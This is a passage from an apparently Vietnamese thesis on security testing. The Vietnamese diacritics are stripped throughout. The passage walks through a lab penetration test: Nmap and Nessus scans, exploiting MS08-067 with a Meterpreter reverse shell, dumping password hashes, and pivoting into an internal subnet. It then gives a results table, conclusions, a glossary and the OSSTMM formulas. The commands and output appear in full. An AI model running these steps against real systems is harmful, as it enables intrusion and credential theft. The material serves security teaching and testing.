[*] Nmap: 139/tcp open netbios-ssn
[*] Nmap: 445/tcp open microsoft-ds Microsoft Windows 2003 or 2008 microsoft-ds
[*] Nmap: 1025/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 1026/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 3389/tcp open microsoft-rdp Microsoft Terminal Service
[*] Nmap: MAC Address: 00:15:5D:11:62:07 (Microsoft)
[*] Nmap: Running: Microsoft Windows 2000|XP|2003
[*] Nmap: OS details: Microsoft Windows 2000 SP2 - SP4, Windows XP SP2 - SP3, or Windows
Server 2003 SP0 - SP2
Ta thy cc cng 80, 135, 139, 445, 1025, 1026, 3013 v 3389 m v nmap
d on mt s dch v tng ng vi tng cng, nmap cng d on rng HH
chy trn my mc tiu l Windows 2003 v khng nh phn on ny, ta c
th dng remote desktop connection t xa kt ni n, giao din my t xa tr v
xc nhn iu ny.
82
Bc 3: Tm l hng. Dng OpenVAS tm l hng trn a ch pht hin
bc 1. OpenVAS l cng c ci sn trn BackTrack. Tuy nhin, thun tin
hn, ta nn dng Nessus hoc NeXpose qut l hng. Hai cng c ny kh tt,
li c kh nng lu kt qu tm c trong CSDL dng bi Metasploit Framework,
nhng khng ci sn trong BackTrack, v vy phi ti v v ci t (ch cn dng
bn min ph l nhu cu). Thc t s dng th trong khi OpenVAS tm thy 4 l
hng nghim trng th Nessus tm thy 60 l hng vi 10 l hng nghim trng.
i vi NeXpose th tm thy 18 l hng nhng im mnh ca cng c ny l
chc nng ch ra nhng khai thc no c th dng vi Metasploit, trong hnh 17
cho thy c 33 khai thc c th dng trn 18 l hng tm c.
Hnh 16: Qut l hng bng Nessus
Hnh 17: Qut l hng bng NeXpose
Kh nng vt tri ca Nessus v NeXpose chnh l plug-in cho php chy v
lu kt qu trc tip trong Metasploit. Ta qut l hng dng Nessus bng on lnh
sau ( d nhn bit tc gi thm s th t u mi lnh, trong giao din thc t
khng c s th t ny):
(1) msf > load nessus
(2) msf > nessus_connect nstung:abc123@localhost:8834
(3) msf > nessus_policy_list
(4) msf > nessus_scan_new -1 quet_may_111 172.16.17.111
(5) msf > nessus_report_list
[+] Nessus Report List
83
ID Name Status Date
-- ---- ------ ----
b77d3d45-bfa3-5b1e-f8dd-e8a3809dc1a926462bdddfa84f7a quet_may_111 completed 11:42 Aug
08 2012
(6) msf > nessus_report_get b77d3d45-bfa3-5b1e-f8dd-e8a3809dc1a926462bdddfa84f7a
(7) msf > vulns 172.16.17.111
(8) msf > search ms08_067
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
rt gn
exploit/windows/smb/ms08_067_netapi 2008-10-28 00:00:00 UTC great Microsoft Server
Service Relative Path Stack Corruption
Lnh (1) ti plug-in ca Nessus vo Metasploit; lc ny dng lnh help s
thy thm danh sch cc lnh ca Nessus; lnh (2) kt ni n my ch Nessus
vi ti khon ngi dng v mt khu to khi ci Nessus; lnh (3) xem danh sch
cc policy (chnh sch) chn mt policy dng khi qut, gi tr ct ID c a
vo tham s u tin ca lnh (4); lnh (4) chnh thc to mt nhim v qut l
hng vi cc tham s c m t nh sau: -1 l ID ca policy, quet_mang_gia_lap l
tn nhim v, 172.16.17.111 l mc tiu (tham s ny c th l di a ch, tn my,
subnet); lnh (5) xem danh sch bo co c to khi xong lnh (4), ch bit
nhim v qut xong cha dng lnh nessus_scan_status; lnh (6) chuyn kt qu
bo co vo CSDL ca Metasploit, tham s l ID ca bo co ly trong lnh (5);
lnh (7) xem cc l hng tm c t Nessus, ta tm c mt l hng c tn
ms08_067; a vo lnh (8) tm exploit tng ng vi l hng trn. By gi ta c
th chuyn sang bc tip theo.
Bc 4: Khai thc l hng ta thy lnh (8), vi l hng MS08_067 th
Metasploit c exploit tng ng l exploit/windows/smb/ms08_067_netapi dng lnh use
ti khai thc ny ln nh sau:
(9) msf > use exploit/windows/smb/ms08_067_netapi
(10) msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
(11) msf exploit(ms08_067_netapi) > set RHOST 172.16.17.111
RHOST => 172.16.17.111
(12) msf exploit(ms08_067_netapi) > set LHOST 172.16.17.20
LHOST => 172.16.17.20
(13) msf exploit(ms08_067_netapi) > show targets
Exploit targets:
Id Name
84
-- ----
rt gn
7 Windows 2003 SP0 Universal
(14) msf exploit(ms08_067_netapi) > set target 7
target => 7
(15) msf exploit(ms08_067_netapi) > show options
rt gn
(16) msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 172.16.17.20:4444
[*] Sending stage (752128 bytes) to 172.16.17.111
[*] Meterpreter session 1 opened (172.16.17.20:4444 -> 172.16.17.111:4640) at 2012-08-10
16:20:41 +0700
meterpreter >
Tng ng vi mt exploit th c mt hoc nhiu payload, payload no ta
dng lnh show payloads ngay sau lnh ti exploit. Chn payload ti lnh (10); cc
lnh t (11), (12), (13) v (14) nhp tham s cho exploit v payload, ch sau
khi chy xong lnh (9) ta c th chy lnh (15) bt c lc no kim tra tham s
nhp hoc nhp ng cha, nu gi tr ct required l yes th phi thit lp gi tr
cho bin . Cui cng chy lnh (16) thc thi khai thc. Khi thy thng bo
nh trong hnh oval th chng t ta khai thc thnh cng v ta ang shell ca
Meterpreter.
Ch : Vic tm c mt khai thc tng ng vi l hng tm c khng h
d dng. V vy, ta c th dng mt cng c l autopwn t ng tm nhng khai
thc da trn l hng qut c lu trong CSDL ca Metasploit v ln lt thc
hin ht cc khai thc . Tuy nhin, dng n phi cn thn v khai thc hng lot
vo mc tiu c th gy v mc tiu. V n b o nh vy nn trong
Metasploit v.4 n b loi b, nhng ta vn c th tm v dng n nh l plug-in.
Vn cn mt cng c khc an ton hn l lnh vuln-exploit m trong plug-in
auto_exploit. Cho php lit k cc exploit c kh nng dng trn l hng tm c.
Bc 5: By gi l bc Leo thang c quyn, c th dng nhiu cch, dng
lnh getsystem nng quyn chng ta thnh quyn h thng. Sau ly gi tr bm
ca mt khu ca cc ti khon ngi dng bng lnh hashdump.
(17) meterpreter > hashdump
Administrator:500:49d58563113416eb9c5014ae4718aee:41291269bf30dc4c9270a8b888e3bbe9:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
rt gn
85
c gi tr bm ca mt khu th c nhiu cch b mt khu ny; tp
trung vo mt khu ca ti khon Administrator. Cch n gin nht l dng cc
trang web b mt khu trn Internet, v d: http://crackstation.net/ nh hnh 16. Ta
cng c th vo shell ca my mc tiu v chy lnh net user to ti khon ngi
dng mi v lnh net localgroup thm ti khon va to vo nhm administrators.
Hnh 18: dng website b mt khu
Cch khc l dng phn mm b mt khu nh john the ripper c trong
BackTrack hoc Abel and Cain dng trn Windows. Nu vi cc cch trn khng
c, ta c th ci keylog_recorder bt bn phm ngi dng, dng lnh run
post/windows/capture/keylog_recorder.
Bc 6: Duy tr truy cp, bc ny, v ly c mt khu administrator
v my mc tiu c cho php Remote desktop nn kh nng duy tr truy cp trong
trng hp ny t c. Tuy nhin, nu khng thun li nh trn, ta c th dng
telnet (chy lnh to user chy telnet bng lnh run gettelnet ti meterpreter). Trng
hp khng c nhng iu kin nh trn, ta c th ci backdoor to cng hu.
Bc 7: Hu khai thc, y l bc tm v khai thc thm cc l hng
nhng h thng khc bn trong mng mc tiu m ta khng th thy khi cha hon
thnh tn cng. K thut ny c gi l pivot, cho php da vo mc tiu th
nht, tn cng xong, tn cng tip cc mc tiu khc. Trc tin ta dng lnh
86
ifconfig hoc run get_local_subnets nh lnh (18) bit mc tiu ca ta kt ni vi
mng trong no, subnet bn trong l g.
(18) meterpreter > run get_local_subnets
Local subnet: 172.16.17.0/255.255.255.0
Local subnet: 192.168.50.0/255.255.255.0
(19) meterpreter > background
[*] Backgrounding session 1...
(20) msf exploit(ms08_067_netapi) > route add 192.168.50.0 255.255.255.0 1
[*] Route added
(21) msf exploit(ms08_067_netapi) > route print
Active Routing Table
====================
Subnet Netmask Gateway
------ ------- -------
192.168.50.0 255.255.255.0 Session 1
(22) meterpreter > msfmap 192.168.50.0/24
Starting MSFMap 0.1.1
MSFMap scan report for 192.168.50.1
Host is up.
Not shown: 92 closed ports
PORT STATE SERVICE
23/tcp open telnet
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
1026/tcp open LSA-or-nterm
3389/tcp open ms-wbt-server
MSFMap scan report for 192.168.50.2
Host is up.
Not shown: 96 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
139/tcp open netbios-ssn
445/tcp open microsoft-ds
MSFMap scan report for 192.168.50.21
Host is up.
Not shown: 98 closed ports
PORT STATE SERVICE
139/tcp open netbios-ssn
445/tcp open microsoft-ds
MSFMap done: 256 IP address (3 hosts up) scanned in 59.18 seconds
Dng lnh background ti (19) chy meterpreter di nn. Dng route add
nh tuyn n mng 192.168.50.0/24 i qua session 1 nh (20). Kim tra bng
nh tuyn lnh (21). Lc ny, nu thun li, ta ci nmap ln my mc tiu 1
qut mng trong. Lnh (22) dng lnh msfmap tm cc my mng trong v cng
tng ng trn tng my. Mt cch khc l ta dng module ph tr l auxiliary/
scanner/portscan/tcp qut cng trn cc my mng trong nh sau:
87
(23) msf > use auxiliary/scanner/portscan/tcp
(24) msf auxiliary(tcp) > show options
(25) msf auxiliary(tcp) > set RHOSTS 192.168.50.0/24
RHOSTS => 192.168.50.0/24
(26) msf auxiliary(tcp) > set THREADS 255
THREADS => 255
(27) msf auxiliary(tcp) > run
[*] 192.168.50.1:23 - TCP OPEN
[*] 192.168.50.2:22 - TCP OPEN
rt gn
[*] 192.168.50.21:445 - TCP OPEN
Lnh (23) ti module cn thit ln; lnh (24) xem nhng tham s no cn
nhp, y c tham s bt buc l RHOSTS c thit lp nh lnh (25) v tham
s ty chn l THREADS c thit lp nh lnh (26) tng tc; cui cng dng
lnh (27) chy module ny. T kt qu lnh (22) v (27) ta thy lnh (22) cho
kt qu tt hn. Mng trong c cc a ch 192.168.50.2, 192.168.50.21. C mt
may mn l khi thu thp thng tin v mc tiu 1 bng lnh run winenum, trong danh
sch tn NetBIOS gn mc tiu 1 c tn l XP01, dng lnh ping xp01 pht hin ra
y l a ch 192.168.50.21, c kh nng y l my Windows XP, mc tiu d
khai thc nht. Ta khi ng mt proxy server ri dng n nh tuyn n my
mc tiu 1 nh lnh (28) v (29) sau y:
(28) msf auxiliary(tcp) > use auxiliary/server/socks4a
(29) msf auxiliary(socks4a) > run
[*] Starting the socks4a proxy server
(30) msf auxiliary(socks4a) > use exploit/windows/smb/ms08_067_netapi
(31) msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp_allports
PAYLOAD => windows/meterpreter/reverse_tcp_allports
(32) msf exploit(ms08_067_netapi) > set RHOST 192.168.50.21
RHOST => 192.168.50.21
(33) msf exploit(ms08_067_netapi) > set LPORT 4445
LPORT => 4445
(34) msf exploit(ms08_067_netapi) > show options
(35) msf exploit(ms08_067_netapi) > exploit
rt gn
[*] Meterpreter session 2 opened (172.16.17.20:4445 -> 172.16.17.111:2756) at 2012-08-15
23:57:56 +0700
meterpreter >
tm l hng ca cc mc tiu bn trong ta c th dng Nessus nh tuyn
bi proxychains. Tuy nhin, ti thi im ny phn mm proxychains chy trn
BackTrack 5 R2 64 bits b li cha khc phc c nn kh nng tm l hng bn
trong bng Nessus khng c. Tc gi da vo thng tin thu thp c phn on
88
my Windows XP SP3 c kh nng b l hng MS08-067 nn chy module khai
thc v payload nh lnh (30) v (31); cc lnh (32) v (33) thit lp thng s; lnh
(34) kim tra thng s; v cui cng lnh (35) chy khai thc v thnh cng. Ta c
c shell meterpreter vi session 2. Tc gi cng th khai thc mt vi l hng
in hnh trn Linux vi mc tiu Ubuntu nhng khng thnh cng. Nh vy, qu
trnh KTXN trn mng gi lp hon thnh, by gi l lc bo co v nh gi.
3.5. Bo co v nh gi
Sau khi hon thnh KTXN phn 3.4 th tc gi pht hin 3 my trn mng
gi lp: 01 my Windows 2003 Server; 01 my Ubuntu khng pht hin phin bn;
01 my Windows XP SP3. Kt qu KTXN bng cc cng c trong BackTrack c
th hin theo bng sau:
My 1 My 2 My 3
a ch 172.16.17.111
192.168.1.1
192.168.1.2 192.168.1.21
Tn my Test01 Khng pht hin XP01
HH Windows 2000 SP0 Khng pht hin Windows XP SP3
Cng m 80,135,139,445,
1025,1026,3013,
3389
22, 80, 139, 445 139, 445
Dch v www, epmap,
netbios-ns, smb,
dce-rpc, msrdp
ssh, http, netbios-
ssn, microsoft-ds
netbios-ssn,
microsoft-ds
S l hng 60 0 1
Hng tn cng Trc tip Pivoting Pivoting
Loi khai thc exploit/windows/sm
b/ms08_067_netapi
exploit/windows/sm
b/ms08_067_netapi
Kt qu xm nhp Thnh cng Khng thnh cng Thnh cng
Phng hng
khc phc
Ci bn v li theo
Microsoft Security
Bulletin MS08-067
Khng c Ci bn v li theo
Microsoft Security
Bulletin MS08-067
Kt lun Vn cha on
nhn chnh xc
phin bn HH.
Xm nhp v gy
HH Linux kh
pht hin mc
tiu. Hng tn
cng pivot cng
Windows XP hu
nh kh d dng b
t thng trc cc
tn cng cho d l
89
tn thng h thng
kh d dng.
cn tr kh nng
thnh cng.
qua pivot.
Phng n khc
phc
Ci bn v cho
Windows 2003
Server ti a ch:
http://technet.micro
soft.com/en-
us/security/bulletin/
ms08-067
Ci bn v cho
Windows XP ti a
ch:
http://technet.micro
soft.com/en-
us/security/bulletin/
ms08-067
Tham kho BID: 31874
CERT: TA08-297A
CVE: CVE-2008-
4250
MS: MS08-067
SECUNIA: 32326
BID: 31874
CERT: TA08-297A
CVE: CVE-2008-
4250
MS: MS08-067
SECUNIA: 32326
Bng 9: Kt qu KTXN
Sau y l danh sch cc phn mm dng trong qu trnh KTXN v mc
thnh cng ca tng phn mm theo tiu ch km: khng s dng c hoc khng
cho kt qu ng; trung bnh: cho kt qu khng y ; tt: cho kt qu ng;
xut sc: cho kt qu ng v kt qu d dng ti s dng trong phn mm khc.
STT Tn phn mm Xut sc Tt Trung bnh Km
1 Hping2 x
2 Genlist x
3 Nessus x
4 NeXpose x
5 Nmap x
6 Metasploit framework x
7 Proxychains x
8 Abel & Cain x
9 OpenVAS x
10 John the ripper x
Bng 10: nh gi cng c dng trong KTXN
T bng nh gi ny c th nhn thy Nmap, Nessus, NeXpose v Metasploit
ng vai tr ch cht trong qu trnh KTXN. Nmap ng vai tr phn tch mc
tiu, Nessus v NeXpose ng vai tr pht hin l hng v c bit l Metasploit
90
tn dng cc kt qu ca cc phn mm trn tin hnh khai thc l hng, leo thang
c quyn, duy tr truy cp. Bn thn Metasploit framework cng c ci sn nhiu
cng c qut cng, qut l hng, tn dng thm.
Mu bo co KTXN c th tham kho mu bo co STAR trnh by ton b
qu trnh KTXN v kt qu ng thi phi hp vi bo co pht sinh bi cng c
NeXpose ghi nhn nhng l hng tm c bi cng c ny tham kho phng
hng khc phc nhng l hng ny. Kh khn ca cch ny l cc mu bo co
u bng ting Anh, nhm KTXN phi chuyn ng v iu chnh cho ph hp vi
ngn ng Vit nam. Bt k c nhn hay t chc hot ng trong lnh vc KTXN
u phi t xy dng mt mu bo co ring, thng nht trong nhm s dng
lu di.
3.6. Tm tt chng 3
KTXN cho ta thy tc hi gh gm ca vic khng cp nht thng xuyn cc
bn v li phn mm hoc khng c cc bit php bo v thch hp cc ti sn
CNTT ca t chc, c nhn. D liu c th b xem, sa i thm ch xa m ch s
hu rt kh pht hin c. Cc li trn Windows c nhiu khai thc hn trn
Linux. Mt vn cng kh phc tp l nh danh l hng. L hng c pht
hin ra rt nhiu v hin nay c nhiu t chc nh danh cc l hng ny nh CVE,
BID, OSVDB, ISS X-Force, Secunia, khi dng mt cng c qut l hng th cc
l hng tm c c th c tham chiu vi nhiu tn khc nhau. Vn ny
khng nm trong phm vi lun vn nhng nm vng cch t tn l hng t nhiu
t chc cng gip ta xc nh chnh xc c l hng v bn cht ca l hng cng
nh cch khc phc.
91
KT LUN
Trong khi phng php OSSTMM ch trng phn tch an ninh t a ra s
liu an ninh thc t vi mc ch xc nh cp an ninh c kt qu chnh xc,
nht qun, lp i lp li m t tp trung hng dn s dng cng c nh gi an
ninh, th ISSAF ch trng phn tch ri ro v hng dn s dng cc cng c va
t pht trin va tng hp t ngun th ba (ch yu m ngun m). Phng php
OWASP cng ch trng phn tch ri ro nhng i tng chnh li l ng dng
web, mc d m t k thut KTXN kh tt nhng OWASP li khuyn khch pht
trin ng dng web mt cch an ninh ngay t giai on u pht trin ng dng
vi cc k thut xem xt nh gi th cng, m hnh e da, xem xt m ngun.
Phng php BackTrack thc cht l quy trnh KTXN vi mt ngun cng c
phong ph, a dng, c thng nht qun l v cp nht thng xuyn
Hu ht cc phng php u cho rng KTXN quan trng nhng khng phi
cng c chnh kim sot an ninh cho h thng. R rng, KTXN ch c ngh khi
c thc hin trong mi trng sn xut, ni i tng mc tiu hot ng v
tng tc vi mi trng xung quanh, vi cc ng dng khc nhau. S hot ng
cng vi nhau nh vy c th gy nn nhng l hng, im yu an ninh m khng
xut hin khi i tng hot ng c lp hoc trong mi trng phng th
nghim. KTXN cng l khng nh nhng l hng an ninh l c tht v c th
b khai thc. V vy, KTXN c coi l bin php sau cng, khi cc bin php an
ninh khc thc hin nh qut l hng, nh gi ri ro, phn tch an ninh, xem
xt m ngun v KTXN cng c thc hin thng xuyn cng tt.
Cng c KTXN th rt nhiu nhng hu nh khng s dng c bao nhiu,
kh nhiu cng c b li, hoc khng cho kt qu. S dng duy nht mt cng c
trong mt giai on c th l khng, v mi cng c cho kh nhiu kt qu sai, nht
92
l dng tnh gi. V vy cn thc hin mt cng vic trn nhiu cng c tng
ng v so snh kt qu.
Lun vn tm hiu c bn phng php KTAN ph bin hin nay, phn
tch u nhc im ca tng phng php. T cc t chc, doanh nghip c th
tn dng c u im ca tng ci xy dng nn mt phng php ph hp vi
c th ca h. Lun vn cng nu c mt s cc cng c KTAN thng dng
v cch s dng chng.
Lun vn cng cha tm hiu cc phng php KTAN nh IDART ch
trng nh gi an ninh theo k thut i ; Hng dn nh gi cc kim sot an
ninh ca NIST (NIST SP 800-53A); WASC-TC tp trung nh gi an ninh ng
dng web ging OWASP. Cc k thut KTXN phc tp nh KTXN hp en,
KTXN ng dng web, KTXN qua tng la/IDS vn cha thc hin c, l do l
thi gian c hn. Mt cch tip cn KTXN m hin nay c nghin cu nhiu l
phi hp cc phng php c nhm tn dng nhng mt mnh ca cc phng
php cng cha tm hiu.
c th ca KTAN nhn chung khc vi kim th phn mm. N khng
nhng i hi kin thc CNTT ni chung v an ninh ni ring tht tt m cn kh
nng sng to. V KTAN mt mt l xc minh h thng lm vic theo ng yu
cu chc nng m ngi xy dng hoc ch s hu mong mun, mt khc phi
chng minh h thng c kh nng lm vic khng ng vi thit k nh cch nhn
ca k tn cng. Nn c th thc hin c tt cc k thut KTAN th ngi
KTAN phi ch ng tm hiu s dng thnh tho cc cng c v phn tch c
u nhc im ca tng cng c .
Tm li, y l lnh vc kh mi m ti Vit Nam v th gii. Mt phng
php chun, thng nht cho KTAN l cha c, l do ch quan l cha c s phi
hp nghin cu t nhiu t chc c nhn, l do khch quan l cha c mt thang
o an ninh chun, mi t chc nh gi mc an ninh khc nhau. V thi gian c
93
hn nn khng trnh c sai st, tc gi rt mong c c s gp t thy c v
cc bn cng nh t cc c nhn quan tm n lnh vc an ninh CNTT hon
thin ti ny hn na.
94
PH LC A. THUT NG
Ting Vit Ting Anh Din gii
A
An ninh Security L thut ng vit tt ca an ninh thng tin
dng trong lun vn ny. An ninh l sn phm
v qui trnh m bo cc ti sn CNTT ca t
chc hoc c nhn c khng b truy cp, sa
i hoc xa khng php. ng thi m bo
cc c nhn hp php vn s dng c bnh
thng. Mc tiu ca an ninh theo CIA bao
gm 3 phn: b mt (confidentiality), ton vn
(integrity), sn sng (availability). Tuy nhin
hu ht cc ti liu khc thm tiu ch na l
trch nhim (accountability) [8].
An ton Safety Mt hnh thc bo v bng kim sot trc
nhng mi e da v nh hng ca n [5].
m tnh gi False negative Xc nh l ng nhng thc s l sai.
B
BackTrack BackTrack L HH Linux tp hp nhng phn mm an
ninh nhm mc ch KTXN.
Bt thng Anomaly L bt k nhng thnh phn khng ng nht
hoc khng bit m khng th kim sot v
khng th thc hin nhng hot ng bnh
thng
B mt tn cng Surface attack B mt tn cng l s thiu nhng phn tch
c th v cc kim sot chc nng tn ti trn
hng tng tc .
B mt Confidentiality L mt kim sot m bo rng cc bn tng
tc trao i v hin th mt ti sn m khng b
cc bn khc bit [5].
B qui tc Ruleset L tp hp cc quy tc hoc du hiu dng
so snh vi lung d liu trn mng hoc hnh
x ca h thng xc nh hnh ng thch
hp
Bi thng Indemnification L mt kim sot thng qua mt hp ng
gia ch s hu ti sn v mt bn i tc.
Hp ng ny c th theo hnh thc a ra
cnh bo nh l mt tin ca mt hnh
ng php l nu khng tun th cc lut
c cng b, ng thi cng b cc bo v
php l, hoc bn th 3 cung cp bo m ca
trong trng hp thit hi, ging nh cng ty
bo him [5].
95
C
Cnh bo Alarm L mt kim sot nhm thng bo mt s
tng tc ang hoc xy ra [5].
Chinh phc Subjugation L kim sot m bo rng ch nhng tng
tc xut hin ph hp vi nhng qui trnh
c nh ngha [5].
Cng ngh x hi Social engineering L k thut phi cng ngh thu thp thng
tin nhy cm nhm xm nhp h thng. K
thut ny c th l la o qua in thoi,
email, web, hoc li dng cc quan h gia
ngi vi ngi ly thng tin.
D
Do dai Resilience L kim sot i vi tt c cc tng tc
duy tr s bo v cc ti sn trong trng hp
sai lc hoc h hng [5].
Dng tnh gi False Positive Xc nh sai nhng thc s ng.
im yu Weakness L sai st hoc li dn n gin on, gim,
lm dng, hoc v hiu nhng c tnh nh
hng ca cc kim sot an ninh [5].
xp Porosity Cc im tng tc, cc hot ng, c phn
loi l Tm nhn, Truy cp, hoc Tin tng [5].
i Red-team L nhm c vai tr tn cng vo h thng.
i xanh Blue-team L nhm c vai tr bo v mt h thng.
H
Hn ch Limitation L trng thi hin ti ca gii hn nhn thc v
hiu bit i vi cc knh, hot ng, v kim
sot nh xc minh trong kim tra [5].
Hng hc Failure L kt qu ca mt li xut hin lm cho
chng trnh khng hot ng c hay hot
ng nhng kt qu khng nh mong i [16].
Hng Vector Chiu ca mt tng tc [5].
K
Kim sot Controls Cc kim sot gim nh hng v mt mt.
m bo rng nhng ti sn vt l hoc ti sn
thng tin cng nh cc knh gia chng c
bo v khi nhng kiu tng tc khng ng
nh nh ngha ca cc knh [5].
Kim th Testing Kim th l tin trnh thc thi mt chng
trnh vi mc ch tm ra li [1].
Kim th an ninh Security testing Mt hnh thc kim th h thng m theo
bn c gng lm tn thng c ch an ninh ca
mt ng dng hoc h thng [1].
Kim th xm nhp Penetration testing L mt k thut KTAN m ngi kim th
96
phi ng vai l nh k tn cng xm nhp
vo mc tiu nhm tm ra nhng im yu, l
hng qua gip t chc qun l mc tiu
thy c tc hi ca vic khng khc phc
nhng im yu .
Kim th hp en Black-box testing L mt kiu kim th m chng trnh c
xem nh mt thc th hon chnh v cu trc
ni b c b qua. D liu th nghim ch
c xut pht t c t ng dng [1][3][24].
Kim th hp trng White-box testing L mt kiu kim th m trong ta kim tra
cu trc bn trong ca mt chng trnh
[1][3][24].
Kim tra Audit L kt qu ca mt phn tch thc hin sau
kim th.
Khng thoi thc Non-Repudiation L mt kim sot nhm ngn chn bn tng
tc t chi vai tr ca n trong bt k tng
tc no [5].
Khai thc Exploit ch vic dng cng c hay phn mm li
dng mt l hng trong h thng/ng dng/
dch v lm h thng khng hot ng
ng chc nng.
K thut thm d Review techniques L nhng k thut xem xt v thm d h
thng mc tiu nhm nhn bit v tm nhng
im yu an ninh [24].
L
Lin tc Continuity L kim sot i vi tt c cc tng tc
duy tr tnh tng tc vi ti sn trong trng
hp sai lc hay h hng [5].
L hng Vulnerability L nhng sai st hoc li m ngi hoc tin
trnh c php b t chi truy cp vo h
thng; hoc ngi hoc tin trnh khng c
php li c cp quyn truy cp; hoc cho
php ngi hoc tin trnh khng c php
giu ti sn hoc bn thn chng trong h
thng [5].
Li Error Xut hin trong phn mm nh l kt qu ca
mt sai st [16].
Log Thng tin lu trong thit b CNTT lit k
nhng hot ng pht sinh trong thit b ,
nhm mc ch xem xt li.
M
Mi e da Threat L bt k trng hp hoc s kin c kh nng
nh hng tiu cc n h thng thng tin
thng qua truy cp tri php, thay i d liu,
hoc/v t chi dch v.
97
P
Phn tch m Fuzzy analysis L k thut nhp d liu sai, c hi v ngu
nhin vo ng dng pht hin li.
Q
Quan tm Concern L sai st hoc li dn n gin on, gim,
lm dng, hoc v hiu nhng nh hng ca
thc thi ca nm kim sot qu trnh: khng
thoi thc, b mt, ring t, ton vn v cnh
bo [5].
R
Ring t Privacy L mt kim sot m bo rng cch thc lm
th no mt ti sn c truy nhp, hin th,
hay trao i nh th no gia cc bn m
khng bn ngoi cc bn bit [5].
Ri ro Risk
S
Sai st Fault L mt s nhm ln hay mt s hiu sai trong
qu trnh pht trin phn mm ca ngi pht
trin [16].
T
Tm nhn Visibility Tm nhn l mt phng tin tnh ton c
hi. Bao gm ti sn ca mc tiu bit tn
ti trong phm vi.
Thm tra Verification Thm tra l tin trnh nhm xc nh u ra
ca mt cng on trong vic pht trin phn
mm ph hp vi cng on trc .
Thit b thm d Sniffer L nhng thit b hay cng c phn mm c
gn hay ci t trn mng thu thp cc gi
tin lu chuyn trn mng.
Tip xc Exposure L mt hnh ng, sai st hoc li v l cung
cp tm nhn trc tip hoc gin tip n mc
tiu hoc ti sn trong phm vi knh chn la
Tin tc Hacker Tin tc c dng trong lun vn ch nhng
ngi dng nhng hiu bit k thut CNTT
tn cng vo h thng CNTT nhm mc ch
ph hoi, t li. Khc vi tin tc m trng hay
tin tc o c. Cng c gi l k tn cng
(attacker).
Tin tc m trng White hat hacker Ging nh tin tc nhng mc ch ca tin tc
m trng gip ch s hu ti sn CNTT
pht hin nhng im yu khc phc.
98
Tin tc o c Ethical hacker Ging tin tc m trng.
Tin tng Trust L mi quan h tn ti m mc tiu ny chp
nhn s tng tc t do vi mc tiu khc
trong phm vi.
Ton vn Integrity L mt kim sot m bo rng cc bn tng
tc bit nhng thay i ca ti sn v quy trnh
[5].
Truy cp Access L kh nng tng tc trc tip vi ti sn.
Truy cp c tnh bi s cc v tr khc nhau
ni tng tc c th xut hin.
X
Xc nhn Validation Xc nhn l tin trnh nhm ch ra ton h
thng pht trin xong ph hp vi ti liu
m t yu cu.
Xc thc Authentication L mt kim sot thng qua nhng i hi
thng tin chng nhn da trn nhn dng v
cp php
99
PH LC B. CNG THC TNH
AN NINH THC T THEO RAV
Phn ny m t cch tnh An ninh thc t theo RAV m file Excel lm
nhm hiu r hn c s nh lng ca phng php OSSTMM. Cng thc tnh an
ninh thc t theo n v RAV c tnh nh sau:
Trong , cc tham s ca cng thc c xc nh nh m t sau y.
OpSec
base
l gi tr an ninh hot ng c s c tnh bng cng thc:
OpSec
base
= log
2
(1+100 x OpSec
sum
) (1)
Vi OpSec
sum
l An ninh hot ng cn c gi l xp ca phm vi, c
tnh bng tng ca Tm nhn (P
V
), Truy cp (P
A
), v Tin tng (P
T
) ca phm vi:
OpSec
sum
= P
V
+P
A
+P
T
FC
base
l Kim sot y c s, gi tr ca n c tnh bng cng thc:
FC
base
= log
2
(1 + 10 x LC
sum
) (2)
LC
sum
l tng S kim sot mt mt (cc c ch an ninh a ra bo v cc
hot ng) c tnh l:
LC
sum
= LC
Au
+LC
Id
+LC
Re
+LC
Su
+LC
Ct
+LC
NR
+LC
Cf
+LC
Pr
+LC
It
+LC
Al
Vi cc i lng trong biu thc l s lng ca tng loi kim sot mt mt
trong tng s 10 loi kim sot.
LC
Au
l s kim sot mt mt ca loi kim sot Xc thc.
LC
Id
l s kim sot mt mt ca loi kim sot Bi thng.
LC
Re
l s kim sot mt mt ca loi kim sot Do dai.
100
LC
Su
l s kim sot mt mt ca loi kim sot Chinh phc.
LC
Ct
l s kim sot mt mt ca loi kim sot Lin tc.
LC
NR
l s kim sot mt mt ca loi kim sot Khng thoi thc.
LC
Cf
l s kim sot mt mt ca loi kim sot B mt.
LC
Pr
l s kim sot mt mt ca loi kim sot Ring t.
LC
It
l s kim sot mt mt ca loi kim sot Ton vn.
LC
Al
l s kim sot mt mt ca loi kim sot Cnh bo.
Tng ng vi 10 s kim sot mt mt trn l 10 kim sot thiu MC
Au
,
MC
Id
, MC
Re
, MC
Su
, MC
Ct
, MC
NR
, MC
It
, MC
Pr
, MC
Cf
, MC
Al
c tnh theo thut
ton:
IF OpSec
sum
LC
Au
<= 0 THEN
MC
Au
= 0
ELSE MC
Au
= OpSec
sum
LC
Au
Tng t vi cc kim sot thiu cn li. T ta c tng kim sot thiu:
MC
sum
=MC
Au
+MC
Id
+MC
Re
+MC
Su
+MC
Ct
+MC
NR
+MC
It
+M
Pr
+MC
Cf
+MC
Al
Tng kim sot thiu lp A:
MC
A
=MC
Au
+MC
Id
+MC
Re
+MC
Su
+MC
Ct
Tng kim sot thiu lp B:
MC
B
=MC
NR
+MC
It
+M
Pr
+MC
Cf
+MC
Al
Tip theo, i lng SecLim
base
l Hn ch an ninh c s, c tnh theo cng
thc nh sau:
SecLim
base
= log
2
(1+100 x SecLim
sum
) (3)
101
Trong , SecLim
sum
l tng Hn ch an ninh c tnh bng tng ca tng s
ca mi loi hn ch nhn vi gi tr trng s ca mi hn ch tng ng.
SecLim
sum
=(L
V
x WV
V
)+(L
W
x WV
W
)+(L
C
x WV
C
)+(L
E
x WV
E
)+(L
A
x WV
A
)
Vi cc i lng c tnh nh bng sau:
u vo Trng s Bin
L hng L
V
MC
